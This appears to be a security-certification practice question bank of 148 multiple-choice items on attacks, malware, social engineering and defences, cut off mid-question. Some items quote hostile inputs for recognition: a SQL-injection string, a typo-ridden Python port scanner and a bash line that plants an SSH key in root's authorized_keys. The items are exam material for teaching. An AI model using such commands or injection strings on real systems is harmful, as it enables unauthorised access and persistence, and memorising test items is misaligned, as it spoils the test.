1. Ahmed is a sales manager with a major insurance company. He has received an email that is
encouraging him to click on a link and fill out a survey. He is suspicious of the email, but it
does mention a major insurance association, and that makes him think it might be legitimate.
Which of the following best describes this attack?
A. Phishing
B. Social engineering
C. Spear phishing
D. Trojan horse
■
2. You are a security administrator for a medium-sized bank. You have discovered a piece of
software on your bank’s database server that is not supposed to be there. It appears that the
software will begin deleting database files if a specific employee is terminated. What best
describes this?
A. Worm
B. Logic bomb
C. Trojan horse
D. Rootkit
■
3. You are responsible for incident response at Acme Bank. The Acme Bank website has been
attacked. The attacker used the login screen, but rather than enter login credentials, they
entered some odd text: ' or '1' = '1. What is the best description for this attack?
A. Cross-site scripting
B. Cross-site request forgery
C. SQL injection
D. ARP poisoning
■
4. Users are complaining that they cannot connect to the wireless network. You discover that
the WAPs are being subjected to a wireless attack designed to block their Wi-Fi signals.
Which of the following is the best label for this attack?
A. IV attack
B. Jamming
C. WPS attack
D. Botnet
■
5. Frank is deeply concerned about attacks to his company’s e-commerce server. He is particularly
worried about cross-site scripting and SQL injection. Which of the following would best
defend against these two specific attacks?
A. Encrypted web traffic
B. Input validation
C. A firewall
D. An IDS
■
6. You are responsible for network security at Acme Company. Users have been reporting that
personal data is being stolen when using the wireless network. They all insist they only connect
to the corporate wireless access point (AP). However, logs for the AP show that these
users have not connected to it. Which of the following could best explain this situation?
A. Session hijacking
B. Clickjacking
C. Rogue access point
D. Bluejacking
■
7. What type of attack depends on the attacker entering JavaScript into a text area that is
intended for users to enter text that will be viewed by other users?
A. SQL injection
B. Clickjacking
C. Cross-site scripting
D. Bluejacking
■
8. Rick wants to make offline brute-force attacks against his password file very difficult
for attackers. Which of the following is not a common technique to make passwords
harder to crack?
A. Use of a salt
B. Use of a pepper
C. Use of a purpose-built password hashing algorithm
D. Encrypting password plain text using symmetric encryption
9. What term is used to describe spam over Internet messaging services?
A. SPIM
B. SMSPAM
C. IMSPAM
D. TwoFaceTiming
■
10. Susan is analyzing the source code for an application and discovers a pointer de-reference
and returns NULL. This causes the program to attempt to read from the NULL pointer and
results in a segmentation fault. What impact could this have for the application?
A. A data breach
B. A denial-of-service condition
C. Permissions creep
D. Privilege escalation
■
11. Teresa is the security manager for a mid-sized insurance company. She receives a call from
law enforcement, telling her that some computers on her network participated in a massive
denial-of-service (DoS) attack. Teresa is certain that none of the employees at her company
would be involved in a cybercrime. What would best explain this scenario?
A. It is a result of social engineering.
B. The machines all have backdoors.
C. The machines are bots.
D. The machines are infected with crypto-viruses.
12. Unusual outbound network traffic, geographical irregularities, and increases in database read
volumes are all examples of what key element of threat intelligence?
A. Predictive analysis
B. OSINT
C. Indicators of compromise
D. Threat maps
13. Chris needs visibility into connection attempts through a firewall because he believes that a
TCP handshake is not properly occurring. What security information and event management
(SIEM) capability is best suited to troubleshooting this issue?
A. Reviewing reports
B. Packet capture
C. Sentiment analysis
D. Log collection and analysis
14. Chris wants to detect a potential insider threat using his security information and event
management (SIEM) system. What capability best matches his needs?
A. Sentiment analysis
B. Log aggregation
C. Security monitoring
D. User behavior analysis
15. Chris has hundreds of systems spread across multiple locations and wants to better handle
the amount of data that they create. What two technologies can help with this?
A. Log aggregation and log collectors
B. Packet capture and log aggregation
C. Security monitoring and log collectors
D. Sentiment analysis and user behavior analysis
16. What type of security team establishes the rules of engagement for a cybersecurity exercise?
A. Blue team
B. White team
C. Purple team
D. Red team
17. Cynthia is concerned about attacks against an application programming interface (API) that
her company provides for its customers. What should she recommend to ensure that the API
is only used by customers who have paid for the service?
A. Require authentication.
B. Install and configure a firewall.
C. Filter by IP address.
D. Install and use an IPS.
18. What type of attack is based on sending more data to a target variable than the data can
actually hold?
A. Bluesnarfing
B. Buffer overflow
C. Bluejacking
D. Cross-site scripting
19. An email arrives telling Gurvinder that there is a limited time to act to get a software package
for free and that the first 50 downloads will not have to be paid for. What social engineering
principle is being used against him?
A. Scarcity
B. Intimidation
C. Authority
D. Consensus
20. You have been asked to test your company network for security issues. The specific test you
are conducting involves primarily using automated and semiautomated tools to look for
known vulnerabilities with the various systems on your network. Which of the following best
describes this type of test?
A. Vulnerability scan
B. Penetration test
C. Security audit
D. Security test
21. Susan wants to reduce the likelihood of successful credential harvesting attacks via her organization’s
commercial websites. Which of the following is not a common prevention method
aimed at stopping credential harvesting?
A. Use of multifactor authentication
B. User awareness training
C. Use of complex usernames
D. Limiting or preventing use of third-party web scripts and plugins
22. Greg wants to gain admission to a network which is protected by a network access control
(NAC) system that recognized the hardware address of systems. How can he bypass this
protection?
A. Spoof a legitimate IP address.
B. Conduct a denial-of-service attack against the NAC system.
C. Use MAC cloning to clone a legitimate MAC address.
D. None of the above
23. Coleen is the web security administrator for an online auction website. A small number of
users are complaining that when they visit the website it does not appear to be the correct
site. Coleen checks and she can visit the site without any problem, even from computers
outside the network. She also checks the web server log and there is no record of those users
ever connecting. Which of the following might best explain this?
A. Typo squatting
B. SQL injection
C. Cross-site scripting
D. Cross-site request forgery
24. The organization that Mike works in finds that one of their domains is directing traffic
to a competitor’s website. When Mike checks, the domain information has been changed,
including the contact and other administrative details for the domain. If the domain had not
expired, what has most likely occurred?
A. DNS hijacking
B. An on-path attack
C. Domain hijacking
D. A zero-day attack
25. Mahmoud is responsible for managing security at a large university. He has just performed a
threat analysis for the network, and based on past incidents and studies of similar networks,
he has determined that the most prevalent threat to his network is low-skilled attackers who
wish to breach the system, simply to prove they can or for some low-level crime, such as
changing a grade. Which term best describes this type of attacker?
A. Hacktivist
B. Amateur
C. Insider
D. Script kiddie
26. How is phishing different from general spam?
A. It is sent only to specific targeted individuals.
B. It is intended to acquire credentials or other data.
C. It is sent via SMS.
D. It includes malware in the message.
27. Which of the following best describes a collection of computers that have been compromised
and are being controlled from one central point?
A. Zombienet
B. Botnet
C. Nullnet
D. Attacknet
28. Selah includes a question in her procurement request-for-proposal process that asks how
long the vendor has been in business and how many existing clients the vendor has. What
common issue is this practice intended to help prevent?
A. Supply chain security issues
B. Lack of vendor support
C. Outsourced code development issues
D. System integration problems
29. John is conducting a penetration test of a client’s network. He is currently gathering
information from sources such as archive.org, netcraft.com, social media, and
information websites. What best describes this stage?
A. Active reconnaissance
B. Passive reconnaissance
C. Initial exploitation
D. Pivot
30. Alice wants to prevent SSRF attacks. Which of the following will not be helpful for preventing
them?
A. Removing all SQL code from submitted HTTP queries
B. Blocking hostnames like 127.0.01 and localhost
C. Blocking sensitive URLs like /admin
D. Applying whitelist-based input filters
31. What type of attack is based on entering fake entries into a target network’s domain
name server?
A. DNS poisoning
B. ARP poisoning
C. XSS poisoning
D. CSRF poisoning
32. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the test,
he has only been given the company name, the domain name for their website, and the IP
address of their gateway router. What best describes this type of test?
A. A known environment test
B. External test
C. An unknown environment test
D. Threat test
33. You work for a security company that performs penetration testing for clients. You are conducting
a test of an e-commerce company. You discover that after compromising the web
server, you can use the web server to launch a second attack into the company’s internal network.
What best describes this?
A. Internal attack
B. Known environment testing
C. Unknown environment testing
D. A pivot
34. While investigating a malware outbreak on your company network, you discover something
very odd. There is a file that has the same name as a Windows system DLL, and it even has
the same API interface, but it handles input very differently, in a manner to help compromise
the system, and it appears that applications have been attaching to this file, rather than the
real system DLL. What best describes this?
A. Shimming
B. Trojan horse
C. Backdoor
D. Refactoring
35. Which of the following capabilities is not a key part of a SOAR (security orchestration, automation,
and response) tool?
A. Threat and vulnerability management
B. Security incident response
C. Automated malware analysis
D. Security operations automation
36. John discovers that email from his company’s email servers is being blocked because of spam
that was sent from a compromised account. What type of lookup can he use to determine
what vendors like McAfee and Barracuda have classified his domain as?
A. An nslookup
B. A tcpdump
C. A domain reputation lookup
D. A SMTP whois
37. Frank is a network administrator for a small college. He discovers that several machines
on his network are infected with malware. That malware is sending a flood of packets to a
target external to the network. What best describes this attack?
A. SYN flood
B. DDoS
C. Botnet
D. Backdoor
38. Why is SSL stripping a particular danger with open Wi-Fi networks?
A. WPA2 is not secure enough to prevent this.
B. Open hotspots do not assert their identity in a secure way.
C. Open hotspots can be accessed by any user.
D. 802.11ac is insecure and traffic can be redirected.
39. A sales manager at your company is complaining about slow performance on his computer.
When you thoroughly investigate the issue, you find spyware on his computer. He insists that
the only thing he has downloaded recently was a freeware stock trading application. What
would best explain this situation?
A. Logic bomb
B. Trojan horse
C. Rootkit
D. Macro virus
40. When phishing attacks are so focused that they target a specific high-ranking or important
individual, they are called what?
A. Spear phishing
B. Targeted phishing
C. Phishing
D. Whaling
41. What type of threat actors are most likely to have a profit motive for their malicious
activities?
A. State actors
B. Script kiddies
C. Hacktivists
D. Criminal syndicates
42. One of your users cannot recall the password for their laptop. You want to recover that
password for them. You intend to use a tool/technique that is popular with hackers, and
it consists of searching tables of precomputed hashes to recover the password. What best
describes this?
A. Rainbow table
B. Backdoor
C. Social engineering
D. Dictionary attack
43. What risk is commonly associated with a lack of vendor support for a product, such as an
outdated version of a device?
A. Improper data storage
B. Lack of patches or updates
C. Lack of available documentation
D. System integration and configuration issues
44. You have noticed that when in a crowded area, you sometimes get a stream of unwanted text
messages. The messages end when you leave the area. What describes this attack?
A. Bluejacking
B. Bluesnarfing
C. Evil twin
D. Rogue access point
45. Dennis uses an on-path attack to cause a system to send HTTPS traffic to his system and
then forwards it to the actual server the traffic is intended for. What type of password attack
can he conduct with the data he gathers if he captures all the traffic from a login form?
A. A plain-text password attack
B. A pass-the-hash attack
C. A SQL injection attack
D. A cross-site scripting attack
46. Someone has been rummaging through your company’s trash bins seeking to find documents,
diagrams, or other sensitive information that has been thrown out. What is this called?
A. Dumpster diving
B. Trash diving
C. Social engineering
D. Trash engineering
47. Louis is investigating a malware incident on one of the computers on his network. He has
discovered unknown software that seems to be opening a port, allowing someone to remotely
connect to the computer. This software seems to have been installed at the same time as a
small shareware application. Which of the following best describes this malware?
A. RAT
B. Worm
C. Logic bomb
D. Rootkit
48. Jared is responsible for network security at his company. He has discovered behavior on one
computer that certainly appears to be a virus. He has even identified a file he thinks might be
the virus. However, using three separate antivirus programs, he finds that none can detect the
file. Which of the following is most likely to be occurring?
A. The computer has a RAT.
B. The computer has a zero-day exploit.
C. The computer has a worm.
D. The computer has a rootkit.
49. Which of the following is not a common means of attacking RFID badges?
A. Data capture
B. Spoofing
C. Denial-of-service
D. Birthday attacks
50. Your wireless network has been breached. It appears the attacker modified a portion of data
used with the stream cipher and used this to expose wirelessly encrypted data. What is this
attack called?
A. Evil twin
B. Rogue WAP
C. IV attack
D. WPS attack
51. The company that Scott works for has experienced a data breach, and the personal
information of thousands of customers has been exposed. Which of the following impact
categories is not a concern as described in this scenario?
A. Financial
B. Reputation
C. Availability loss
D. Data loss
52. What type of attack exploits the trust that a website has for an authenticated user to attack
that website by spoofing requests from the trusted user?
A. Cross-site scripting
B. Cross-site request forgery
C. Bluejacking
D. Evil twin
53. What purpose does a fusion center serve in cyberintelligence activities?
A. It promotes information sharing between agencies or organizations.
B. It combines security technologies to create new, more powerful tools.
C. It generates power for the local community in a secure way.
D. It separates information by classification ratings to avoid accidental distribution.
54. CVE is an example of what type of feed?
A. A threat intelligence feed
B. A vulnerability feed
C. A critical infrastructure listing feed
D. A critical virtualization exploits feed
55. What type of attack is a birthday attack?
A. A social engineering attack
B. A cryptographic attack
C. A network denial-of-service attack
D. A TCP/IP protocol attack
56. Juanita is a network administrator for Acme Company. Some users complain that they keep
getting dropped from the network. When Juanita checks the logs for the wireless access point
(WAP), she finds that a deauthentication packet has been sent to the WAP from the users’ IP
addresses. What seems to be happening here?
A. Problem with users’ Wi-Fi configuration
B. Disassociation attack
C. Session hijacking
D. Backdoor attack
57. John has discovered that an attacker is trying to get network passwords by using software
that attempts a number of passwords from a list of common passwords. What type of
attack is this?
A. Dictionary
B. Rainbow table
C. Brute force
D. Session hijacking
58. You are a network security administrator for a bank. You discover that an attacker has
exploited a flaw in OpenSSL and forced some connections to move to a weak cipher suite
version of TLS, which the attacker could breach. What type of attack was this?
A. Disassociation attack
B. Downgrade attack
C. Session hijacking
D. Brute force
59. When an attacker tries to find an input value that will produce the same hash as a password,
what type of attack is this?
A. Rainbow table
B. Brute force
C. Session hijacking
D. Collision attack
60. Farès is the network security administrator for a company that creates advanced routers and
switches. He has discovered that his company’s networks have been subjected to a series of
advanced attacks over a period of time. What best describes this attack?
A. DDoS
B. Brute force
C. APT
D. Disassociation attack
61. What type of information is phishing not commonly intended to acquire?
A. Passwords
B. Email addresses
C. Credit card numbers
D. Personal information
62. John is running an IDS on his network. Users sometimes report that the IDS flags legitimate
traffic as an attack. What describes this?
A. False positive
B. False negative
C. False trigger
D. False flag
63. Scott discovers that malware has been installed on one of the systems he is responsible for.
Shortly afterward passwords used by the user that the system is assigned to are discovered to
be in use by attackers. What type of malicious program should Scott look for on the compromised
system?
A. A rootkit
B. A keylogger
C. A worm
D. None of the above
64. You are performing a penetration test of your company’s network. As part of the test, you
will be given a login with minimal access and will attempt to gain administrative access with
this account. What is this called?
A. Privilege escalation
B. Session hijacking
C. Root grabbing
D. Climbing
65. Matt discovers that a system on his network is sending hundreds of Ethernet frames to the
switch it is connected to, with each frame containing a different source MAC address. What
type of attack has he discovered?
A. Etherspam
B. MAC flooding
C. Hardware spoofing
D. MAC hashing
66. Spyware is an example of what type of malware?
A. Trojan
B. PUP
C. RAT
D. Ransomware
67. Mary has discovered that a web application used by her company does not always handle
multithreading properly, particularly when multiple threads access the same variable. This
could allow an attacker who discovered this vulnerability to exploit it and crash the server.
What type of error has Mary discovered?
A. Buffer overflow
B. Logic bomb
C. Race conditions
D. Improper error handling
68. An attacker is trying to get access to your network. He is sending users on your network a
link to a new game with a hacked license code program. However, the game files also include
software that will give the attacker access to any machine that it is installed on. What type of
attack is this?
A. Rootkit
B. Trojan horse
C. Spyware
D. Boot sector virus
69. The following image shows a report from an OpenVAS system. What type of weak configuration
is shown here?
A. Weak encryption
B. Unsecured administrative accounts
C. Open ports and services
D. Unsecure protocols
70. While conducting a penetration test, Annie scans for systems on the network she has gained
access to. She discovers another system within the same network that has the same accounts
and user types as the one she is on. Since she already has a valid user account on the system
she has already accessed, she is able to log in to it. What type of technique is this?
A. Lateral movement
B. Privilege escalation
C. Privilege retention
D. Vertical movement
71. Amanda scans a Red Hat Linux server that she believes is fully patched and discovers
that the Apache version on the server is reported as vulnerable to an exploit from a few
months ago. When she checks to see if she is missing patches, Apache is fully patched. What
has occurred?
A. A false positive
B. An automatic update failure
C. A false negative
D. An Apache version mismatch
72. When a program has variables, especially arrays, and does not check the boundary values
before inputting data, what attack is the program vulnerable to?
A. XSS
B. CSRF
C. Buffer overflow
D. Logic bomb
73. Tracy is concerned that the software she wants to download may not be trustworthy, so she
searches for it and finds many postings claiming that the software is legitimate. If she installs
the software and later discovers it is malicious and that malicious actors have planted those
reviews, what principle of social engineering have they used?
A. Scarcity
B. Familiarity
C. Consensus
D. Trust
74. Which of the following best describes malware that will execute some malicious activity
when a particular condition is met (i.e., if the condition is met, then executed)?
A. Boot sector virus
B. Logic bomb
C. Buffer overflow
D. Sparse infector virus
75. What term describes using conversational tactics as part of a social engineering exercise to
extract information from targets?
A. Pretexting
B. Elicitation
C. Impersonation
D. Intimidation
76. Telnet, RSH, and FTP are all examples of what?
A. File transfer protocols
B. Unsecure protocols
C. Core protocols
D. Open ports
77. Scott wants to determine where an organization’s wireless network can be accessed from.
What testing techniques are his most likely options?
A. OSINT and active scans
B. War driving and war flying
C. Social engineering and active scans
D. OSINT and war driving
78. Gerald is a network administrator for a small financial services company. Users are reporting
odd behavior that appears to be caused by a virus on their machines. After isolating the
machines that he believes are infected, Gerald analyzes them. He finds that all the infected
machines received an email purporting to be from accounting, with an Excel spreadsheet, and
the users opened the spreadsheet. What is the most likely issue on these machines?
A. A macro virus
B. A boot sector virus
C. A Trojan horse
D. A RAT
79. Your company has hired an outside security firm to perform various tests of your network.
During the vulnerability scan, you will provide that company with logins for various systems
(i.e., database server, application server, web server, etc.) to aid in their scan. What best
describes this?
A. A known environment test
B. A gray-box test
C. A credentialed scan
D. An intrusive scan
80. Steve discovers the following code on a system. What language is it written in, and what
does it do?
import socket as skt
for port in range (1,9999):
try:
sc=skt.socket(askt.AF_INET,skt.SOCK_STREAM)
sc.settimeout(900)
sc.connect(('127.0.0.1,port))
print '%d:OPEN' % (port)
sc.close
except: continue
A. Perl, vulnerability scanning
B. Python, port scanning
C. Bash, vulnerability scanning
D. PowerShell, port scanning
81. Which of the following is commonly used in a distributed denial-of-service (DDoS) attack?
A. Phishing
B. Adware
C. Botnet
D. Trojan
82. Amanda discovers that a member of her organization’s staff has installed a remote access
Trojan on their accounting software server and has been accessing it remotely. What type of
threat has she discovered?
A. Zero-day
B. Insider threat
C. Misconfiguration
D. Weak encryption
83. Postings from Russian agents during the 2016 U.S. presidential campaign to Facebook and
Twitter are an example of what type of effort?
A. Impersonation
B. A social media influence campaign
C. Asymmetric warfare
D. A watering hole attack
84. Juan is responsible for incident response at a large financial institution. He discovers that the
company Wi-Fi has been breached. The attacker used the same login credentials that ship
with the wireless access point (WAP). The attacker was able to use those credentials to access
the WAP administrative console and make changes. Which of the following best describes
what caused this vulnerability to exist?
A. Improperly configured accounts
B. Untrained users
C. Using default settings
D. Failure to patch systems
85. Elizabeth is investigating a network breach at her company. She discovers a program that
was able to execute code within the address space of another process by using the target process
to load a specific library. What best describes this attack?
A. Logic bomb
B. Session hijacking
C. Buffer overflow
D. DLL injection
86. Which of the following threat actors is most likely to be associated with an advanced persistent
threat (APT)?
A. Hacktivists
B. State actors
C. Script kiddies
D. Insider threats
87. What is the primary difference between an intrusive and a nonintrusive vulnerability scan?
A. An intrusive scan is a penetration test.
B. A nonintrusive scan is just a document check.
C. An intrusive scan could potentially disrupt operations.
D. A nonintrusive scan won’t find most vulnerabilities.
88. Your company outsourced development of an accounting application to a local programming
firm. After three months of using the product, one of your administrators discovers that the
developers have inserted a way to log in and bypass all security and authentication. What
best describes this?
A. Logic bomb
B. Trojan horse
C. Backdoor
D. Rootkit
89. Daryl is investigating a recent breach of his company’s web server. The attacker used sophisticated
techniques and then defaced the website, leaving messages that were denouncing the
company’s public policies. He and his team are trying to determine the type of actor who
most likely committed the breach. Based on the information provided, who was the most
likely threat actor?
A. A script
B. A nation-state
C. Organized crime
D. Hacktivists
90. What two techniques are most commonly associated with a pharming attack?
A. Modifying the hosts file on a PC or exploiting a DNS vulnerability on a trusted
DNS server
B. Phishing many users and harvesting email addresses from them
C. Phishing many users and harvesting many passwords from them
D. Spoofing DNS server IP addresses or modifying the hosts file on a PC
91. Angela reviews the authentication logs for her website and sees attempts from many different
accounts using the same set of passwords. What is this attack technique called?
A. Brute forcing
B. Password spraying
C. Limited login attacks
D. Account spinning
92. When investigating breaches and attempting to attribute them to specific threat actors, which
of the following is not one of the indicators of an APT?
A. Long-term access to the target
B. Sophisticated attacks
C. The attack comes from a foreign IP address.
D. The attack is sustained over time.
93. Charles discovers that an attacker has used a vulnerability in a web application that his
company runs and has then used that exploit to obtain root privileges on the web server.
What type of attack has he discovered?
A. Cross-site scripting
B. Privilege escalation
C. A SQL injection
D. A race condition
94. What type of attack uses a second wireless access point (WAP) that broadcasts the same SSID
as a legitimate access point, in an attempt to get users to connect to the attacker’s WAP?
A. Evil twin
B. IP spoofing
C. Trojan horse
D. Privilege escalation
95. Which of the following best describes a zero-day vulnerability?
A. A vulnerability that the vendor is not yet aware of
B. A vulnerability that has not yet been breached
C. A vulnerability that can be quickly exploited (i.e., in zero days)
D. A vulnerability that will give the attacker brief access (i.e., zero days)
96. What type of attack involves adding an expression or phrase such as adding “SAFE” to
mail headers?
A. Pretexting
B. Phishing
C. SQL injection
D. Prepending
97. Charles wants to ensure that his outsourced code development efforts are as secure as
possible. Which of the following is not a common practice to ensure secure remote code
development?
A. Ensure developers are trained on secure coding techniques.
B. Set defined acceptance criteria for code security.
C. Test code using automated and manual security testing systems.
D. Audit all underlying libraries used in the code.
98. You have discovered that there are entries in your network’s domain name server that point
legitimate domains to unknown and potentially harmful IP addresses. What best describes
this type of attack?
A. A backdoor
B. An APT
C. DNS poisoning
D. A Trojan horse
99. Spyware is an example of what type of malicious software?
A. A CAT
B. A worm
C. A PUP
D. A Trojan
100. What best describes an attack that attaches some malware to a legitimate program so that
when the user installs the legitimate program, they inadvertently install the malware?
A. Backdoor
B. Trojan horse
C. RAT
D. Polymorphic virus
101. Which of the following best describes software that will provide the attacker with remote
access to the victim’s machine but that is wrapped with a legitimate program in an attempt
to trick the victim into installing it?
A. RAT
B. Backdoor
C. Trojan horse
D. Macro virus
102. What process typically occurs before card cloning attacks occur?
A. A brute-force attack
B. A skimming attack
C. A rainbow table attack
D. A birthday attack
103. Which of the following is an attack that seeks to attack a website, based on the website’s
trust of an authenticated user?
A. XSS
B. XSRF
C. Buffer overflow
D. RAT
104. Valerie is responsible for security testing applications in her company. She has discovered
that a web application, under certain conditions, can generate a memory leak. What type of
attack would this leave the application vulnerable to?
A. DoS
B. Backdoor
C. SQL injection
D. Buffer overflow
105. The mobile game that Jack has spent the last year developing has been released, and
malicious actors are sending traffic to the server that runs it to prevent it from competing
with other games in the App Store. What type of denial-of-service attack is this?
A. A network DDoS
B. An operational technology DDoS
C. A GDoS
D. An application DDoS
106. Charles has been tasked with building a team that combines techniques from attackers and
defenders to help protect his organization. What type of team is he building?
A. A red team
B. A blue team
C. A white team
D. A purple team
107. Mike is a network administrator with a small financial services company. He has received
a pop-up window that states his files are now encrypted and he must pay .5 bitcoins to get
them decrypted. He tries to check the files in question, but their extensions have changed,
and he cannot open them. What best describes this situation?
A. Mike’s machine has a rootkit.
B. Mike’s machine has ransomware.
C. Mike’s machine has a logic bomb.
D. Mike’s machine has been the target of whaling.
108. When a multithreaded application does not properly handle various threads accessing a
common value, and one thread can change the data while another thread is relying on it,
what flaw is this?
A. Memory leak
B. Buffer overflow
C. Integer overflow
D. Time of check/time of use
109. Acme Company is using smartcards that use near-field communication (NFC) rather than
needing to be swiped. This is meant to make physical access to secure areas more secure.
What vulnerability might this also create?
A. Tailgating
B. Eavesdropping
C. IP spoofing
D. Race conditions
110. Rick believes that Windows systems in his organization are being targeted by fileless viruses.
If he wants to capture artifacts of their infection process, which of the following options is
most likely to provide him with a view into what they are doing?
A. Reviewing full-disk images of infected machines
B. Turning on PowerShell logging
C. Disabling the administrative user account
D. Analyzing Windows crash dump files
111. John is responsible for physical security at a large manufacturing plant. Employees all use a
smartcard in order to open the front door and enter the facility. Which of the following is a
common way attackers would circumvent this system?
A. Phishing
B. Tailgating
C. Spoofing the smartcard
D. RFID spoofing
112. Adam wants to download lists of malicious or untrustworthy IP addresses and domains
using STIX and TAXII. What type of service is he looking for?
A. A vulnerability feed
B. A threat feed
C. A hunting feed
D. A rule feed
113. During an incident investigation, Naomi notices that a second keyboard was plugged into a
system in a public area of her company’s building. Shortly after that event, the system was
infected with malware, resulting in a data breach. What should Naomi look for in her inperson
investigation?
A. A Trojan horse download
B. A malicious USB cable or drive
C. A worm
D. None of the above
114. You are responsible for incident response at Acme Corporation. You have discovered that
someone has been able to circumvent the Windows authentication process for a specific network
application. It appears that the attacker took the stored hash of the password and sent
it directly to the backend authentication service, bypassing the application. What type of
attack is this?
A. Hash spoofing
B. Evil twin
C. Shimming
D. Pass the hash
115. A user in your company reports that she received a call from someone claiming to be from
the company technical support team. The caller stated that there was a virus spreading
through the company and they needed immediate access to the employee’s computer to stop
it from being infected. What social-engineering principles did the caller use to try to trick
the employee?
A. Urgency and intimidation
B. Urgency and authority
C. Authority and trust
D. Intimidation and authority
116. After running a vulnerability scan, Elaine discovers that the Windows 10 workstations in
her company’s warehouse are vulnerable to multiple known Windows exploits. What should
she identify as the root cause in her report to management?
A. Unsupported operating systems
B. Improper or weak patch management for the operating systems
C. Improper or weak patch management for the firmware of the systems
D. Use of unsecure protocols
117. Ahmed has discovered that attackers spoofed IP addresses to cause them to resolve to a different
hardware address. The manipulation has changed the tables maintained by the default
gateway for the local network, causing data destined for one specific MAC address to now
be routed elsewhere. What type of attack is this?
A. ARP poisoning
B. DNS poisoning
C. On-path attack
D. Backdoor
118. What type of penetration test is being done when the tester is given extensive knowledge of
the target network?
A. Known environment
B. Full disclosure
C. Unknown environment
D. Red team
119. Your company is instituting a new security awareness program. You are responsible for educating
end users on a variety of threats, including social engineering. Which of the following
best defines social engineering?
A. Illegal copying of software
B. Gathering information from discarded manuals and printouts
C. Using people skills to obtain proprietary information
D. Phishing emails
120. Which of the following attacks can be caused by a user being unaware of their physical
surroundings?
A. ARP poisoning
B. Phishing
C. Shoulder surfing
D. Smurf attack
121. What are the two most common goals of invoice scams?
A. Receiving money or acquiring credentials
B. Acquiring credentials or delivering a rootkit
C. Receiving money or stealing cryptocurrency
D. Acquiring credentials or delivering ransomware
122. Which of the following type of testing uses an automated process of proactively identifying
vulnerabilities of the computing systems present on a network?
A. Security audit
B. Vulnerability scanning
C. A known environment test
D. An unknown environment test
123. John has been asked to do a penetration test of a company. He has been given general
information but no details about the network. What kind of test is this?
A. Partially known environment
B. Known environment
C. Unknown environment
D. Masked
124. Under which type of attack does an attacker’s system appear to be the server to the real
client and appear to be the client to the real server?
A. Denial-of-service
B. Replay
C. Eavesdropping
D. On-path
125. You are a security administrator for Acme Corporation. You have discovered malware on
some of your company’s machines. This malware seems to intercept calls from the web
browser to libraries, and then manipulates the browser calls. What type of attack is this?
A. Man in the browser
B. On-path attack
C. Buffer overflow
D. Session hijacking
126. Tony is reviewing a web application and discovers the website generates links like the
following:
https://www.example.com/login.html?Relay=http%3A%2F%2Fexample.com%2Fsite
.html
What type of vulnerability is this code most likely to be susceptible to?
A. SQL injection
B. URL redirection
C. DNS poisoning
D. LDAP injection
127. You are responsible for software testing at Acme Corporation. You want to check all software
for bugs that might be used by an attacker to gain entrance into the software or your
network. You have discovered a web application that would allow a user to attempt to put a
64-bit value into a 4-byte integer variable. What is this type of flaw?
A. Memory overflow
B. Buffer overflow
C. Variable overflow
D. Integer overflow
128. Angela has discovered an attack against some of the users of her website that leverage URL
parameters and cookies to make legitimate users perform unwanted actions. What type of
attack has she most likely discovered?
A. SQL injection
B. Cross-site request forgery
C. LDAP injection
D. Cross-site scripting
129. Nathan discovers the following code in the directory of a compromised user. What language
is it using, and what will it do?
echo "ssh-rsa ABBAB4KAE9sdafAK...Mq/jc5YLfnAnbFDRABMhuWzaWUp
root@localhost" >> /root/.ssh/authorized_keys
A. Python, adds an authorized SSH key
B. Bash, connects to another system using an SSH key
C. Python, connects to another system using an SSH key
D. Bash, adds an authorized SSH key
130. Jared has discovered malware on the workstations of several users. This particular malware
provides administrative privileges for the workstation to an external hacker. What best
describes this malware?
A. Trojan horse
B. Logic bomb
C. Multipartite virus
D. Rootkit
131. Why are memory leaks a potential security issue?
A. They can expose sensitive data.
B. They can allow attackers to inject code via the leak.
C. They can cause crashes
D. None of the above
132. Michelle discovers that a number of systems throughout her organization are connecting to
a changing set of remote systems on TCP port 6667. What is the most likely cause of this, if
she believes the traffic is not legitimate?
A. An alternate service port for web traffic
B. Botnet command and control via IRC
C. Downloads via a peer-to-peer network
D. Remote access Trojans
133. Susan performs a vulnerability scan of a small business network and discovers that the organization’s
consumer-grade wireless router has a vulnerability in its web server. What issue
should she address in her findings?
A. Firmware patch management
B. Default configuration issues
C. An unsecured administrative account
D. Weak encryption settings
134. Where is an RFID attack most likely to occur as part of a penetration test?
A. System authentication
B. Access badges
C. Web application access
D. VPN logins
135. What type of phishing attack occurs via text messages?
A. Bluejacking
B. Smishing
C. Phonejacking
D. Text whaling
136. Users in your company report someone has been calling their extension and claiming to
be doing a survey for a large vendor. Based on the questions asked in the survey, you suspect
that this is a scam to elicit information from your company’s employees. What best
describes this?
A. Spear phishing
B. Vishing
C. War dialing
D. Robocalling
137. John is analyzing a recent malware infection on his company network. He discovers malware
that can spread rapidly via vulnerable network services and does not require any interaction
from the user. What best describes this malware?
A. Worm
B. Virus
C. Logic bomb
D. Trojan horse
138. Your company has issued some new security directives. One of these new directives is that
all documents must be shredded before being thrown out. What type of attack is this trying
to prevent?
A. Phishing
B. Dumpster diving
C. Shoulder surfing
D. On-path attack
139. Which of the following is not a common part of a cleanup process after a penetration test?
A. Removing all executables and scripts from the compromised system
B. Restoring all rootkits to their original settings on the system
C. Returning all system settings and application configurations to their original configurations
D. Removing any user accounts created during the penetration test
140. You have discovered that someone has been trying to log on to your web server. The person
has tried a wide range of likely passwords. What type of attack is this?
A. Rainbow table
B. Birthday attack
C. Dictionary attack
D. Spoofing
141. Jim discovers a physical device attached to a gas pump’s credit card reader. What type of
attack has he likely discovered?
A. A replay attack
B. A race condition
C. A skimmer
D. A card cloner
142. What is the primary difference between active and passive reconnaissance?
A. Active will be done manually, passive with tools.
B. Active is done with black-box tests and passive with white-box tests.
C. Active is usually done by attackers and passive by testers.
D. Active will actually connect to the network and could be detected; passive won’t.
143. A browser toolbar is an example of what type of malware?
A. A rootkit
B. A RAT
C. A worm
D. A PUP
144. What term describes data that is collected from publicly available sources that can be used
in an intelligence context?
A. OPSEC
B. OSINT
C. IntCon
D. STIX
145. What type of attack targets a specific group of users by infecting one or more websites that
that group is specifically known to visit frequently?
A. A watercooler attack
B. A phishing net attack
C. A watering hole attack
D. A phish pond attack
146. Tracy is concerned about LDAP injection attacks against her directory server. Which of the
following is not a common technique to prevent LDAP injection attacks?
A. Secure configuration of LDAP
B. User input validation
C. LDAP query parameterization
D. Output filtering rules
147. Fred uses a Tor proxy to browse for sites as part of his threat intelligence. What term is
frequently used to describe this part of the Internet?
A. Through the looking glass
B. The dark web
C. The underweb
D. Onion-space
148. What browser feature is used to help prevent successful URL redirection attacks?
A. Certificate expiration tracking
B. Displaying the full real URL
C. Disabling cookies
